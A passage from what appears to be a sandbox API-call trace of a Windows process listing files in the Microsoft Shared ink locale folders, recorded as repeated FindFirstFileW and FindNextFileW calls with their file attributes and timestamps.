nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0044.211] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.211] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6fbc310, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe71ab4c9, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe71d1626, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0044.211] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6fbc310, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe71ab4c9, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe71d1626, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0044.211] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0044.211] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0044.211] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0044.211] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\.", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE", lpFilePart=0x0) returned 0x38 [0044.211] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0044.211] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0044.211] CoTaskMemFree (pv=0x4fe370) [0044.211] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0044.212] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE", lpFilePart=0x0) returned 0x38 [0044.212] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0044.212] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE", lpFilePart=0x0) returned 0x38 [0044.212] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\", lpFilePart=0x0) returned 0x39 [0044.212] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0044.254] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.254] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe728fcf7, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe74cb16a, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe74cb16a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0044.254] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0044.254] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0044.254] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0044.255] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0044.255] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui", lpFilePart=0x0) returned 0x48 [0044.255] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0044.255] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE", lpFilePart=0x0) returned 0x38 [0044.255] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\", lpFilePart=0x0) returned 0x39 [0044.255] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0044.255] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.255] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe728fcf7, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe74cb16a, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe74cb16a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0044.255] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe728fcf7, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe74cb16a, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe74cb16a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0044.255] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0044.256] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0044.256] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0044.256] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\.", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR", lpFilePart=0x0) returned 0x38 [0044.256] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0044.256] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0044.256] CoTaskMemFree (pv=0x4fe370) [0044.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0044.256] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR", lpFilePart=0x0) returned 0x38 [0044.256] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0044.256] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR", lpFilePart=0x0) returned 0x38 [0044.256] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\", lpFilePart=0x0) returned 0x39 [0044.256] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0044.257] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.257] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe31667d9, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe337baef, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe337baef, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0044.257] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0044.257] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0044.257] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0044.257] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0044.257] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\tipresx.dll.mui", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\tipresx.dll.mui", lpFilePart=0x0) returned 0x48 [0044.257] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0044.257] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR", lpFilePart=0x0) returned 0x38 [0044.257] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\", lpFilePart=0x0) returned 0x39 [0044.257] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0044.258] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.258] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe31667d9, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe337baef, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe337baef, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0044.258] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe31667d9, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe337baef, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe337baef, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0044.258] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0044.258] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0044.258] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0044.258] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\.", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US", lpFilePart=0x0) returned 0x38 [0044.258] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0044.258] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0044.258] CoTaskMemFree (pv=0x4fe370) [0044.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0044.258] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US", lpFilePart=0x0) returned 0x38 [0044.259] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0044.259] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US", lpFilePart=0x0) returned 0x38 [0044.259] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\", lpFilePart=0x0) returned 0x39 [0044.259] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e0df36a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0044.271] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e0df36a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.271] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a407849, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x9a407849, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x9a407849, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x15e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="boxed-correct.avi", cAlternateFileName="")) returned 1 [0044.271] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23b3de0, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x23b3de0, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a49fdc1, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x7c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="boxed-delete.avi", cAlternateFileName="")) returned 1 [0044.271] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23d9f3d, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x23d9f3d, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a4c5f1f, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x8200, dwReserved0=0x0, dwReserved1=0x0, cFileName="boxed-join.avi", cAlternateFileName="")) returned 1 [0044.271] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24261f7, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x24261f7, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a538339, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xf600, dwReserved0=0x0, dwReserved1=0x0, cFileName="boxed-split.avi", cAlternateFileName="")) returned 1 [0044.271] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x244c354, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x244c354, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a55e497, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x30200, dwReserved0=0x0, dwReserved1=0x0, cFileName="correct.avi", cAlternateFileName="")) returned 1 [0044.272] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24be76b, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x24be76b, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a5845f5, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x36c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="delete.avi", cAlternateFileName="")) returned 1 [0044.272] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x0, dwReserved1=0x0, cFileName="FlickLearningWizard.exe.mui", cAlternateFileName="")) returned 1 [0044.272] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc8723b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xe067905, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xdc8723b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1200, dwReserved0=0x0, dwReserved1=0x0, cFileName="InkObj.dll.mui", cAlternateFileName="")) returned 1 [0044.272] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2400, dwReserved0=0x0, dwReserved1=0x0, cFileName="InkWatson.exe.mui", cAlternateFileName="")) returned 1 [0044.272] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="InputPersonalization.exe.mui", cAlternateFileName="")) returned 1 [0044.272] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x5800, dwReserved0=0x0, dwReserved1=0x0, cFileName="IPSEventLogMsg.dll.mui", cAlternateFileName="")) returned 1 [0044.272] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, 